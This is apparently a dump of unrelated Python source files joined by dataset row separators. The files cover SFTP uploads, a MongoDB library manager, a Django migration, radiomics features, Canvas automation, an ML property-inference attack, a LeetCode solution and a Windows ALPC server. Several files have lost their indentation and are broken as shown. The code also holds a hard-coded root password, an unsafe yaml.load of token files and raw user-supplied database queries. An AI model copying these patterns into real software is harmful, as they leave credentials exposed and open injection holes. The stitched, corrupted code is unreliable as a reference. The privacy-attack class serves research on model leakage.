# # t.connect(username="root",password="123456")
# sftp = paramiko.SFTPClient.from_transport(t)
# rmpath = "/root/install.log"
# localpath = os.path.dirname(os.path.abspath(__file__)) + os.sep + "install.log"
# sftp.get(rmpath,localpath)
# t.close()
#ไปๆฌๅฐ๏ผwindows๏ผไธไผ ๆไปถ่ณLinuxๆๅกๅจ
"""
ๅฏ็ ๆ่
ๅฏ้ฅ็ปๅฝ
"""
t = paramiko.Transport(("192.168.64.129",22))
t.connect(username="root",pkey=paramiko.RSAKey.from_private_key_file("C:\\Users\\22950\\skey"))
# t.connect(username="root",password="123456")
sftp = paramiko.SFTPClient.from_transport(t)
rmpath = "/home/adolph/TestUpload.war"
localpath = os.path.dirname(os.path.abspath(__file__)) + os.sep + "TestUpload.war"
sftp.put(localpath,rmpath)
t.close() |
995,223 | d3d895c0b30aadcfdaff7287ec1902bf9f461235 | import os
import json
from book import Book
import pymongo
from ast import literal_eval
#Initialize DB connection
client = pymongo.MongoClient("mongodb://localhost:27017")
db = client["library"]
books_db = db["books"]
def clear_screen():
os.system('clear')
def print_options():
print("Choose your option")
print("1. Create a Book")
print("2. Issue a book")
print("3. Return a book")
print("4. Update a book")
print("5. Show all books")
print("6. Show specific book")
print("7. Find")
print("--- Press x to Exit ---")
print("\n\n")
def input_book_info():
print("Please enter your book info")
id = input("Enter ID: ")
name = input("Enter Name: ")
isbn = input("Enter ISBN: ")
page_count = int(input("Enter the Page count: "))
issued = input("Has your book being issued? y/n: ")
issued = (issued.lower == "y")
author = input("Enter the Author: ")
year = int(input("Enter the year when the book has been published: "))
return {
"id" : id,
"name" : name,
"isbn" : isbn,
"page_count" : page_count,
"issued" : issued,
"author" : author,
"year" : year
}
def create_book():
book_dict = input_book_info()
book = Book(
book_dict['id'],
book_dict['name'],
book_dict['isbn'],
book_dict['page_count'],
book_dict['issued'],
book_dict['author'],
book_dict['year'])
books_db.insert_one(book.to_dict())
print("\nYour book has been created\n")
print(book.to_dict())
return book
def update_book(books):
book_id = input("Please enter the ID of the desired book: ")
book = find_book(book_id)
if(book != None):
print("Current book's information:")
print_book(book)
updated_book_dict = input_book_info()
books_db.update_one(
{"id" : str(book.id)},
{"$set": updated_book_dict}
)
print("Your book has been updated!")
else:
print("Book not found!")
json_books = []
books = []
try:
file = open("books.json","r")
json_books = json.loads(file.read())
file.close()
except Exception as e:
print("There was an error reading the file: ", e)
for json_book in json_books:
book = Book(
json_book['id'],
json_book['name'],
json_book['isbn'],
json_book['page_count'],
json_book['issued'],
json_book['author'],
json_book['year'])
books.append(book)
return books
def print_book(book):
if(book != None):
print("\n")
print("Title: ",book.name)
print("ID: ",book.id)
print("Author: ",book.author)
print("ISBN: ",book.isbn)
print("Pages: ",book.page_count)
print("Year: ",book.year)
print("Issued: ",book.issued)
print("\n----------------------\n")
else:
print("Book not found!")
def show_book():
book_id = int(input("Please enter the ID of the desired book: "))
book = find_book(book_id)
if(book != None):
print_book(book)
else:
print("Book not found!")
def print_books():
books= books_db.find({},
{
"_id":0,
"id":1,
"name":1,
"isbn":1,
"page_count":1,
"issued":1,
"author":1,
"year":1
}).sort("id",1)
print("\n==========================\nList of Books in the system\n==========================\n")
for book_dict in books:
book = Book(
book_dict['id'],
book_dict['name'],
book_dict['isbn'],
book_dict['page_count'],
book_dict['issued'],
book_dict['author'],
book_dict['year'])
print_book(book)
def find_book(book_id):
search = "{\"id\":" + str(book_id)+"}"
book_dict = find_books(search)[0]
book = Book(
book_dict['id'],
book_dict['name'],
book_dict['isbn'],
book_dict['page_count'],
book_dict['issued'],
book_dict['author'],
book_dict['year'])
return book
def issue_book():
book_id = input("Please enter the ID of the book you want to issue: ")
book = find_book(book_id)
if(book != None):
books_db.update_one(
{"id" : str(book.id)},
{"$set": {"issued": True}}
)
print("Your book has been issued!")
else:
print("Book not found!")
def return_book():
book_id = input("Please enter the ID of the book you want to return: ")
book = find_book(book_id)
if(book != None):
books_db.update_one(
{"id" : str(book.id)},
{"$set": {"issued": False}}
)
print("Your book has been returned!")
else:
print("Book not found!")
def find_books(param):
search = literal_eval(param)
print(search)
results = books_db.find(
search
,
{
"_id":0,
"id":1,
"name":1,
"isbn":1,
"page_count":1,
"issued":1,
"author":1,
"year":1
})
return results
def find():
param = input("Please enter search function: ")
results = find_books(param)
result_cnt = 0
if(results != None):
for book_dict in results:
book = Book(
book_dict['id'],
book_dict['name'],
book_dict['isbn'],
book_dict['page_count'],
book_dict['issued'],
book_dict['author'],
book_dict['year'])
result_cnt +=1
print_book(book)
print(result_cnt," results found\n\n")
else:
print("No results!")
|
995,224 | 4993ff1522405ec7541157afc38fa2f169a9e708 | # Generated by Django 2.0.3 on 2018-12-10 22:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Extra',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
],
),
migrations.CreateModel(
name='MenuItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[('Regular Pizza', 'Regular Pizza'), ('Sicilian Pizza', 'Sicilian Pizza'), ('Sub', 'Sub'), ('Pasta', 'Pasta'), ('Salad', 'Salad'), ('Dinner Platter', 'Dinner Platter')], max_length=64)),
('name', models.CharField(blank=True, max_length=64)),
('takesExtras', models.BooleanField()),
('isOneSize', models.BooleanField()),
('singleSizeCost', models.DecimalField(blank=True, decimal_places=2, max_digits=4, null=True)),
('smallCost', models.DecimalField(blank=True, decimal_places=2, max_digits=4, null=True)),
('largeCost', models.DecimalField(blank=True, decimal_places=2, max_digits=4, null=True)),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(default='open', max_length=64)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='OrderItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('size', models.CharField(max_length=64)),
],
),
migrations.CreateModel(
name='Pizza',
fields=[
('menuitem_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='orders.MenuItem')),
('numberToppings', models.IntegerField()),
],
bases=('orders.menuitem',),
),
migrations.AddField(
model_name='orderitem',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='orders.MenuItem'),
),
migrations.AddField(
model_name='orderitem',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='orders.Order'),
),
migrations.AddField(
model_name='extra',
name='forItems',
field=models.ManyToManyField(limit_choices_to={'takesExtras': True}, related_name='extras', to='orders.MenuItem'),
),
]
|
995,225 | 37b4d1cf7471d347db710a8181ea84cd413787a5 | import numpy
import collections
import SimpleITK as sitk
import RadiomicsPlatform.RadiomicsImageArrayLib
import pdb
class LoGFeatures:
def __init__(self, imageFilePath, labelFilePath, binwidth, pixelSpacing):
self.sigmaValues = numpy.arange(5.0, 0.0, -0.5)[::-1]
self.imageFilePath = imageFilePath
self.labelFilePath = labelFilePath
self.binwidth = binwidth
self.pixelSpacing = pixelSpacing
self.sitkImageNode = sitk.ReadImage(imageFilePath)
self.sitkLabelNode = sitk.ReadImage(labelFilePath)
self.labelNodeArray = sitk.GetArrayFromImage(self.sitkLabelNode)
#self.bincount = numpy.ceil((numpy.max(self.parameterValues) - numpy.min(self.parameterValues))/float(self.binwidth))
#self.cubicMMPerVoxel = reduce(lambda x,y: x*y , self.pixelSpacing)
self.InitializeFeatureVector()
def InitializeFeatureVector(self):
self.prefix = "LoG_"
self.laplacian_gaussian_FeatureVector = collections.OrderedDict()
for sigma in self.sigmaValues:
matrix_LoGFiltered, matrixCoordinates_LoGFiltered = self.ApplyLoGFilter(self.sitkImageNode, self.labelNodeArray, sigma)
qwert = matrix_LoGFiltered.copy()
pdb.set_trace()
try:
LoGFeatureVector = collections.OrderedDict()
# entropyPos, meanPos, uniformityPos use the positive values in the filtered image array only
# filteredImageValuesPos = filteredImageValues[filteredImageValues>=0]
# later, when computing
LoGFirstOrderStatistics = RadiomicsPlatform.RadiomicsFeaturesLib.Radiomics_First_Order(matrix_LoGFiltered, matrixCoordinates_LoGFiltered, self.binwidth, self.pixelSpacing)
LoGFeatureVector.update( LoGFirstOrderStatistics.EvaluateFeatures() )
LoGTextureFeaturesGLCM = RadiomicsPlatform.RadiomicsFeaturesLib.Radiomics_GLCM(matrix_LoGFiltered, matrixCoordinates_LoGFiltered, self.binwidth)
LoGFeatureVector.update( LoGTextureFeaturesGLCM.EvaluateFeatures() )
LoGTextureFeaturesGLRL = RadiomicsPlatform.RadiomicsFeaturesLib.Radiomics_RLGL(matrix_LoGFiltered, matrixCoordinates_LoGFiltered, self.binwidth)
LoGFeatureVector.update( LoGTextureFeaturesGLRL.EvaluateFeatures() )
#LoGTextureFeaturesGLSZM = RadiomicsPlatform.RadiomicsFeaturesLib.TextureGLSZM(matrix_LoGFiltered, matrixCoordinates_LoGFiltered, self.binwidth)
#LoGFeatureVector.update( LoGTextureFeaturesGLSZM.EvaluateFeatures() )
except IndexError:
continue
for radiomicsLoGFeature in LoGFeatureVector:
self.laplacian_gaussian_FeatureVector[self.prefix + str(sigma).replace(".","_") + "_mm_3D_" + radiomicsLoGFeature] = LoGFeatureVector[radiomicsLoGFeature]
def ApplyLoGFilter(self, sitkImageNode, labelNodeArray, sigma):
LoGFilter = sitk.LaplacianRecursiveGaussianImageFilter()
LoGFilter.SetSigma(sigma)
sitkImageNode_LoGFiltered = LoGFilter.Execute(sitkImageNode)
imageNodeArray_LoGFiltered = sitk.GetArrayFromImage(sitkImageNode_LoGFiltered)
matrix_LoGFiltered, matrixCoordinates_LoGFiltered = RadiomicsPlatform.RadiomicsImageArrayLib.PadTumorMaskToCube(imageNodeArray_LoGFiltered, labelNodeArray)
return matrix_LoGFiltered, matrixCoordinates_LoGFiltered
def entropyValue(self, parameterArray, bincount):
bins = numpy.histogram(parameterArray, bins=bincount)[0]
bins = bins/float(bins.sum())
return (-1.0 * numpy.sum(bins*numpy.where(bins!=0,numpy.log2(bins),0)))
def meanIntensity(self, parameterArray):
return (numpy.mean(parameterArray))
def standardDeviation(self, parameterArray):
return (numpy.std(parameterArray))
def _moment(self, a, moment=1, axis=0):
if moment == 1:
return numpy.float64(0.0)
else:
mn = numpy.expand_dims(numpy.mean(a,axis), axis)
s = numpy.power((a-mn), moment)
return numpy.mean(s, axis)
def skewnessValue(self, a, axis=0):
m2 = self._moment(a, 2, axis)
m3 = self._moment(a, 3, axis)
# Control Flow: if m2==0 then vals = 0; else vals = m3/m2**1.5
zero = (m2 == 0)
vals = numpy.where(zero, 0, m3 / m2**1.5)
if vals.ndim == 0:
return vals.item()
return vals
def kurtosisValue(self, a, axis=0):
m2 = self._moment(a,2,axis)
m4 = self._moment(a,4,axis)
zero = (m2 == 0)
# Set Floating-Point Error Handling
olderr = numpy.seterr(all='ignore')
try:
vals = numpy.where(zero, 0, m4 / m2**2.0)
finally:
numpy.seterr(**olderr)
if vals.ndim == 0:
vals = vals.item() # array scalar
return vals
def uniformityValue(self, parameterArray):
bins = numpy.histogram(parameterArray, bins=self.bincount)[0]
bins = bins/float(bins.sum())
return (numpy.sum(bins**2))
def EvaluateFeatures(self):
for feature in self.laplacian_gaussian_FeatureVector:
try:
self.laplacian_gaussian_FeatureVector[feature] = str(self.laplacian_gaussian_FeatureVector[feature])
except AttributeError:
self.laplacian_gaussian_FeatureVector[feature] = "Function Does Not Exist"
return(self.laplacian_gaussian_FeatureVector)
|
995,226 | f926f01cc7b5adf98fa900495b623375a9716c04 | from time import sleep
from typing import List, Callable, Dict
from functools import wraps
from dataclasses import dataclass
from collections import defaultdict
from utils.courses.courses import HighSchoolCourse, CollegeCourse
import shutil
import pandas as pd
import os
import sys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
def login(driver, url):
# get login page
driver.get(url)
# wait for manual login
WebDriverWait(driver, 35).until(EC.element_to_be_clickable((By.XPATH, "//span[contains(text(), 'UT COLLEGE')]")))
def download_manager(func):
@wraps(func)
def inner(*args, **kwargs):
# preprocessing
driver = args[0]
size = len(os.listdir(driver.download_directory))
# run scraper
func(*args, **kwargs)
# wait for download to start
while len(os.listdir(driver.download_directory)) == size:
sleep(0.05)
return inner
def get_course_type():
# get desired course type from stdin
print()
course_type = input("High school or college [HS/CO]: ").lower().strip()
# error checking
while course_type not in {'hs', 'co'}:
print('Please enter a valid course type.')
course_type = input("High school or college [HS/CO]: ").lower().strip()
# assign course
if course_type == 'hs':
course = HighSchoolCourse()
else:
course = CollegeCourse()
return course
def get_unit_number():
# get unit number for grading purposes from stdin
unit = input("Enter the unit number: ").strip()
# error checking
while not unit.isdigit():
print('Please enter a valid unit number.')
unit = input("Enter the unit number: ").strip()
return unit
def get_survey_inputs():
# get inputs from stdin
inputs = {
'url': input('Enter Qualtrics survey URL: '),
'intro': input('Enter intro text: '),
'finish': input('Enter finished text: ')
}
return inputs
@dataclass
class Assignment:
name: str
duration: int
def get_assignments():
# prompt user
print()
print("Please enter the names and durations of the assignments you would like to add accommodations to exactly as they appear in Canvas.")
print("Enter 'q' into the assignment name to indicate all assignments have been added.")
print()
# get first assignment
name = input("Assignment name (e.g. Exam Unit 3: Part 2): ").strip()
duration = int(input("Duration (e.g. 30): ").strip())
print()
res = [Assignment(name, duration)]
# continue adding assignments as desired
while True:
name = input("Assignment name: ").strip()
if name == 'q':
break
duration = int(input("Duration: ").strip())
print()
res.append(Assignment(name, duration))
return res
def get_range():
# get range
print()
start = int(input("Enter the first page number of the desired courses: "))
end = int(input("Enter the last page number of the desired courses: "))
return range(start, end + 1)
@dataclass
class Student:
first: str
last: str
multiplier: str
def get_students():
# dictionary of students
students = defaultdict(list)
# get filename
print()
filename = input("Enter the filename of the accommodations csv: ")
print()
# get dataframe
df = pd.read_csv(f"{os.path.dirname(sys.executable)}/{filename}")
# df = pd.read_csv(filename)
# parse through students
for i, row in df.iterrows():
if not row['Accommodation Request'].startswith("Extended time"):
continue
# parse through accommodation to get time multipler
accom = row['Accommodation Request'].split(" ")
multiplier = accom[5][1:-1]
# create new instance of a student
students[row['College Course']].append(Student(first=row['Student First Name'], last=row['Student Last Name'], multiplier=multiplier))
return students |
995,227 | e35ff969594564b5e4324866f02d44a086c9461e | from privacy_evaluator.attacks.attack import Attack
from privacy_evaluator.classifiers.classifier import Classifier
from privacy_evaluator.models.train_cifar10_torch import data, train
import math
import numpy as np
import torch
import tensorflow as tf
from sklearn.svm import SVC
from art.attacks.evasion import FastGradientMethod
from art.estimators.classification import SklearnClassifier
from typing import Tuple, Any, Dict, List
class PropertyInferenceAttack(Attack):
def __init__(self, target_model: Classifier):
"""
Initialize the Property Inference Attack Class.
:param target_model: the target model to be attacked
"""
super().__init__(target_model, None, None, None, None)
def create_shadow_training_set(
self,
dataset: torch.utils.data.Dataset,
amount_sets: int,
size_set: int,
property_num_elements_per_classes: Dict[int, int],
) -> Tuple[
List[torch.utils.data.Dataset],
List[torch.utils.data.Dataset],
Dict[int, int],
Dict[int, int],
]:
"""
Create the shadow training sets, half fulfill the property, half fulfill the negation of the property.
The function works for the specific binary case that the property is a fixed distribution specified in the input
and the negation of the property is a balanced distribution.
:param dataset: Dataset out of which shadow training sets should be created
:param amount_sets: how many shadow training sets should be created
:param size_set: size of one shadow training set for one shadow classifier
:param property_num_elements_per_classes: number of elements per class, this is the property
:return: shadow training sets for property,
shadow training sets for negation,
dictionary holding the unbalanced class distribution (=property),
dictionary holding the balanced class distribution (=negation of property)
"""
amount_property = int(round(amount_sets / 2))
property_training_sets = []
neg_property_training_sets = []
# PROPERTY
# according to property_num_elements_per_classes we select the classes and take random elements out of the dataset
# and create the shadow training sets with these elements"""
for i in range(amount_property):
shadow_training_set = []
for class_id, num_elements in property_num_elements_per_classes.items():
subset = data.subset(dataset, class_id, num_elements)
shadow_training_set.append(subset)
shadow_training_set = torch.utils.data.ConcatDataset(shadow_training_set)
property_training_sets.append(shadow_training_set)
# NEG_PROPERTY (BALANCED)
# create balanced shadow training sets with the classes specified in property_num_elements_per_classes
num_elements = int(round(size_set / len(property_num_elements_per_classes)))
for i in range(amount_property):
shadow_training_set = []
for class_id, _ in property_num_elements_per_classes.items():
subset = data.subset(dataset, class_id, num_elements)
shadow_training_set.append(subset)
shadow_training_set = torch.utils.data.ConcatDataset(shadow_training_set)
neg_property_training_sets.append(shadow_training_set)
# create neg_property_num_elements_per_classes, later needed in train_shadow_classifier
neg_property_num_elements_per_classes = {
class_id: num_elements
for class_id in property_num_elements_per_classes.keys()
}
return (
property_training_sets,
neg_property_training_sets,
property_num_elements_per_classes,
neg_property_num_elements_per_classes,
)
def train_shadow_classifiers(
self,
property_training_sets: List[torch.utils.data.Dataset],
neg_property_training_sets: List[torch.utils.data.Dataset],
property_num_elements_per_classes: Dict[int, int],
neg_property_num_elements_per_classes: Dict[int, int],
input_shape: Tuple[int, ...],
):
"""
Train shadow classifiers with each shadow training set (follows property or negation of property).
:param shadow_training_sets_property: datasets fulfilling the property to train 50 % of shadow_classifiers
:param shadow_training_sets_neg_property: datasets not fulfilling the property to train 50 % of shadow_classifiers
:param property_num_elements_per_classes: unbalanced class distribution (= property)
:param neg_property_num_elements_per_classes: balanced class distribution (= negation of property)
:param input_shape: Input shape of a data point for the classifier. Needed in _to_art_classifier.
:return: list of shadow classifiers for the property,
list of shadow classifiers for the negation of the property,
accuracies for the property shadow classifiers,
accuracies for the negation of the property classifiers
:rtype: Tuple[ List[:class:`.art.estimators.estimator.BaseEstimator`],
List[:class:`.art.estimators.estimator.BaseEstimator`],
List[float],
List[float]]
"""
shadow_classifiers_property = []
shadow_classifiers_neg_property = []
accuracy_prop = []
accuracy_neg = []
num_classes = len(property_num_elements_per_classes)
for shadow_training_set in property_training_sets:
len_train_set = math.ceil(len(shadow_training_set) * 0.7)
len_test_set = math.floor(len(shadow_training_set) * 0.3)
train_set, test_set = torch.utils.data.random_split(
shadow_training_set, [len_train_set, len_test_set]
)
accuracy, model_property = train.trainer_out_model(
train_set, test_set, property_num_elements_per_classes, "FCNeuralNet"
)
# change pytorch classifier to art classifier
art_model_property = Classifier._to_art_classifier(
model_property, num_classes, input_shape
)
shadow_classifiers_property.append(art_model_property)
accuracy_prop.append(accuracy)
for shadow_training_set in neg_property_training_sets:
len_train_set = math.ceil(len(shadow_training_set) * 0.7)
len_test_set = math.floor(len(shadow_training_set) * 0.3)
train_set, test_set = torch.utils.data.random_split(
shadow_training_set, [len_train_set, len_test_set]
)
accuracy, model_neg_property = train.trainer_out_model(
train_set,
test_set,
neg_property_num_elements_per_classes,
"FCNeuralNet",
)
# change pytorch classifier to art classifier
art_model_neg_property = Classifier._to_art_classifier(
model_neg_property, num_classes, input_shape
)
shadow_classifiers_neg_property.append(art_model_neg_property)
accuracy_neg.append(accuracy)
return (
shadow_classifiers_property,
shadow_classifiers_neg_property,
accuracy_prop,
accuracy_neg,
)
def feature_extraction(self, model):
"""
Extract the features of a given model.
:param model: a model from which the features should be extracted
:type model: :class:`.art.estimators.estimator.BaseEstimator` # BaseEstimator is very general and could be specified to art.classifier
:return: feature extraction
:rtype: np.ndarray
"""
# Filter out all trainable parameters (from every layer)
# This works differently for PyTorch and TensorFlow. Raise TypeError if model is neither of both.
if isinstance(model.model, torch.nn.Module):
model_parameters = list(
filter(lambda p: p.requires_grad, model.model.parameters())
)
# Store the remaining parameters in a concatenated 1D numPy-array
model_parameters = np.concatenate(
[el.detach().numpy().flatten() for el in model_parameters]
).flatten()
return model_parameters
elif isinstance(model.model, tf.keras.Model):
model_parameters = np.concatenate(
[el.numpy().flatten() for el in model.model.trainable_variables]
).flatten()
return model_parameters
else:
raise TypeError(
f"Expected model to be an instance of {str(torch.nn.Module)} or {str(tf.keras.Model)}, received {str(type(model.model))} instead."
)
def create_meta_training_set(
self, classifier_list_with_property, classifier_list_without_property
):
"""
Create meta training set out of shadow classifiers.
:param classifier_list_with_property: list of all shadow classifiers that were trained on a dataset which fulfills the property
:type classifier_list_with_property: iterable object of :class:`.art.estimators.estimator.BaseEstimator`
:param classifier_list_without_property: list of all shadow classifiers that were trained on a dataset which does NOT fulfill the property
:type classifier_list_without_property: iterable object of :class:`.art.estimators.estimator.BaseEstimator`
:return: tupel (Meta-training set, label set)
:rtype: tupel (np.ndarray, np.ndarray)
"""
# Apply self.feature_extraction on each shadow classifier and concatenate all features into one array
feature_list_with_property = np.array(
[
self.feature_extraction(classifier)
for classifier in classifier_list_with_property
]
)
feature_list_without_property = np.array(
[
self.feature_extraction(classifier)
for classifier in classifier_list_without_property
]
)
meta_features = np.concatenate(
[feature_list_with_property, feature_list_without_property]
)
# Create corresponding labels
# meta_labels = np.concatenate([np.ones(len(feature_list_with_property)), np.zeros(len(feature_list_without_property))])
# For scikit-learn SVM classifier we need one hot encoded labels, therefore:
meta_labels = np.concatenate(
[
np.array([[1, 0]] * len(feature_list_with_property)),
np.array([[0, 1]] * len(feature_list_without_property)),
]
)
return meta_features, meta_labels
def train_meta_classifier(self, meta_training_X, meta_training_y):
"""
Train meta-classifier with the meta-training set.
:param meta_training_X: Set of feature representation of each shadow classifier.
:type meta_training_X: np.ndarray
:param meta_training_y: Set of (one-hot-encoded) labels for each shadow classifier,
according to whether property is fullfilled ([1, 0]) or not ([0, 1]).
:type meta_training_y: np.ndarray
:return: Meta classifier
:rtype: "CLASSIFIER_TYPE" (to be found in `.art.utils`) # classifier.predict is an one-hot-encoded label vector:
[1, 0] means target model has the property, [0, 1] means it does not.
"""
# Create a scikit SVM model, which will be trained on meta_training
model = SVC(C=1.0, kernel="rbf")
# Turn into ART classifier
classifier = SklearnClassifier(model=model)
# Train the ART classifier as meta_classifier and return
classifier.fit(meta_training_X, meta_training_y)
return classifier
def perform_prediction(
self, meta_classifier, feature_extraction_target_model
) -> np.ndarray:
"""
"Actual" attack: Meta classifier gets feature extraction of target model as input, outputs property prediction.
:param meta_classifier: A classifier
:type meta_classifier: "CLASSIFIER_TYPE" (to be found in .art.estimators)
:param feature_extraction_target_model: extracted features of target model
:type feature_extraction_target_model: np.ndarray
:return: Prediction given as probability distribution vector whether property or negation of property is
fulfilled for target data set
:rtype: np.ndarray with shape (1, 2)
"""
assert meta_classifier.input_shape == tuple(
feature_extraction_target_model.shape
)
predictions = meta_classifier.predict(x=[feature_extraction_target_model])
return predictions
def attack(self):
"""
Perform Property Inference attack.
:param params: Example data to run through target model for feature extraction
:type params: np.ndarray
:return: prediction about property of target data set [[1, 0]]-> property; [[0, 1]]-> negation property
:rtype: np.ndarray with shape (1, 2)
"""
# load data (CIFAR10)
train_dataset, test_dataset = data.dataset_downloader()
input_shape = [32, 32, 3]
# count of shadow training sets
amount_sets = 6
# set ratio and size for unbalanced data sets
size_set = 1500
property_num_elements_per_classes = {0: 500, 1: 1000}
# create shadow training sets. Half unbalanced (property_num_elements_per_classes), half balanced
(
property_training_sets,
neg_property_training_sets,
property_num_elements_per_classes,
neg_property_num_elements_per_classes,
) = self.create_shadow_training_set(
test_dataset, amount_sets, size_set, property_num_elements_per_classes
)
# create shadow classifiers with trained models, half on unbalanced data set, half with balanced data set
(
shadow_classifiers_property,
shadow_classifiers_neg_property,
accuracy_prop,
accuracy_neg,
) = self.train_shadow_classifiers(
property_training_sets,
neg_property_training_sets,
property_num_elements_per_classes,
neg_property_num_elements_per_classes,
input_shape,
)
# create meta training set
meta_features, meta_labels = self.create_meta_training_set(
shadow_classifiers_property, shadow_classifiers_neg_property
)
# create meta classifier
meta_classifier = self.train_meta_classifier(meta_features, meta_labels)
# extract features of target model
feature_extraction_target_model = self.feature_extraction(self.target_model)
# get prediction
prediction = self.perform_prediction(
meta_classifier, feature_extraction_target_model
)
return prediction
|
995,228 | 42f1b4ee7578ec5a04b14759c25d66442351b333 | # https://leetcode.com/problems/integer-to-english-words/
import random
class Solution(object):
THOUSANDS = ["Thousand", "Million", "Billion"]
HUNDRED = "Hundred"
SINGLE_DIGIT_IN_ENG = ["One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine"]
DOUBLE_DIGIT_IN_ENG = ["Ten", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety",
"",
"Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
def numberToWords(self, num):
translation = ""
n = num
base = -1
while n > 0:
reminder = n % 1000
this_trans = self.translate_three_digits(reminder)
if base >= 0 and len(this_trans):
this_trans += " " + self.THOUSANDS[base]
translation = this_trans + (" " if len(this_trans) and len(translation) else "") + translation
n /= 1000
base += 1
return translation if len(translation) else "Zero"
def translate_three_digits(self, num):
this_trans = ""
reminder = num
reminder %= 1000
hundred_text = self.get_text(reminder/100, self.SINGLE_DIGIT_IN_ENG, self.HUNDRED)
reminder %= 100
if 10 < reminder < 20:
tens_text = self.DOUBLE_DIGIT_IN_ENG[reminder-1]
ones_text = ""
else:
tens_text = self.get_text(reminder/10, self.DOUBLE_DIGIT_IN_ENG, "")
reminder %= 10
ones_text = self.get_text(reminder, self.SINGLE_DIGIT_IN_ENG, "")
this_trans += hundred_text
this_trans += self.handle_text_paddling(tens_text, this_trans)
this_trans += self.handle_text_paddling(ones_text, this_trans)
return this_trans
@staticmethod
def handle_text_paddling(content_text, full_content_string):
return (" " if len(content_text) and len(full_content_string) else "") + content_text
@staticmethod
def get_text(num, text_dict, unit_text):
return "" if num == 0 else text_dict[num-1] + (" " + unit_text if len(unit_text) > 0 else "")
a = Solution()
for _ in range(100):
print(random.randint(0, 2**31)) |
995,229 | 249b1d6940022569ad58b24cfa46f46e62bcf1a9 | import bs4
import requests
from urllib import request
url = request.urlopen("http://www.sina.com")
WebsiteData = url.read()
# print(WebsiteData)
result = bs4.BeautifulSoup(WebsiteData,"html.parser")
for body in result.find_all('a'):
print(body)
|
995,230 | e54163ba8d2a1d8a17c2e4c13c0da70a1db95322 | import yaml
from shelf.cloud.cloud_exceptions import ArtifactNotFoundError
class PermissionsLoader(object):
def __init__(self, logger, cloud_factory):
"""
Args:
logger(logging.Logger)
cloud_factory(shelf.cloud.factory.Factory)
"""
self.cloud_factory = cloud_factory
self.logger = logger
def load(self, bucket, token):
"""
Gets the contents of the token file (if it can be found) as
a dict.
Args:
bucket(string)
token(string)
Returns:
dict|None
"""
permissions = None
with self.cloud_factory.create_storage(bucket) as storage:
try:
token_file = storage.get_artifact_as_string("_keys/{0}".format(token))
try:
permissions = yaml.load(token_file)
except:
self.logger.info("Failed to decode the token file as YAML.")
except ArtifactNotFoundError:
self.logger.debug("Failed to find token provided.")
return permissions
|
995,231 | 674e83978f3d8b1652948a11a84b26c4475a2b74 | import sys
import multiprocessing
import windows.alpc
from windows.generated_def import LPC_CONNECTION_REQUEST, LPC_REQUEST
import windows.generated_def as gdef
import ctypes
import tempfile
PORT_NAME = r"\RPC Control\PythonForWindowsPORT_2"
PORT_CONTEXT = 0x11223344
def full_alpc_server():
print("server pid = {0}".format(windows.current_process.pid))
server = windows.alpc.AlpcServer(PORT_NAME)
print("[SERV] PORT <{0}> CREATED".format(PORT_NAME))
msg = server.recv()
print("[SERV] == Message received ==")
if msg.type & 0xfff == LPC_CONNECTION_REQUEST:
print(" * ALPC connection request: <{0}>".format(msg.data.decode()))
msg.data = b"Connection message response"
server.accept_connection(msg, port_context=PORT_CONTEXT)
else:
raise ValueError("Expected connection")
while True:
msg = server.recv()
print("[SERV] == Message received ==")
# print(" * Data: {0}".format(msg.data))
# print("[SERV] RECV Message type = {0:#x}".format(msg.type))
# print("[SERV] RECV Message Valid ATTRS = {0:#x}".format(msg.attributes.ValidAttributes))
# print("[SERV] RECV Message ATTRS = {0:#x}".format(msg.attributes.AllocatedAttributes))
if msg.type & 0xfff == LPC_REQUEST:
print(" * ALPC request: <{0}>".format(msg.data.decode()))
print(" * view_is_valid <{0}>".format(msg.view_is_valid))
if msg.view_is_valid:
print(" * message view attribute:")
windows.utils.print_ctypes_struct(msg.view_attribute, " - VIEW", hexa=True)
view_data = windows.current_process.read_string(msg.view_attribute.ViewBase)
print(" * Reading view content: <{0}>".format(view_data))
# Needed in Win7 - TODO: why is there a different behavior ?
msg.attributes.ValidAttributes -= gdef.ALPC_MESSAGE_VIEW_ATTRIBUTE
print(" * security_is_valid <{0}>".format(msg.security_is_valid))
print(" * handle_is_valid <{0}>".format(msg.handle_is_valid))
if msg.handle_is_valid:
if msg.handle_attribute.Handle:
print(" * message handle attribute:")
windows.utils.print_ctypes_struct(msg.handle_attribute, " - HANDLE", hexa=True)
if msg.handle_attribute.ObjectType == 1:
f = windows.utils.create_file_from_handle(msg.handle_attribute.Handle)
print(" - File: {0}".format(f))
print(" - content: <{0}>".format(f.read()))
else:
print(" - unknow object type == {0}".format(msg.handle_attribute.ObjectType))
msg.attributes.ValidAttributes -= gdef.ALPC_MESSAGE_HANDLE_ATTRIBUTE
print(" * context_is_valid <{0}>".format(msg.context_is_valid))
if msg.context_is_valid:
print(" * message context attribute:")
windows.utils.print_ctypes_struct(msg.context_attribute, " - CTX", hexa=True)
if msg.attributes.ValidAttributes & gdef.ALPC_MESSAGE_TOKEN_ATTRIBUTE:
print(" * message token attribute:")
token_struct = msg.attributes.get_attribute(gdef.ALPC_MESSAGE_TOKEN_ATTRIBUTE)
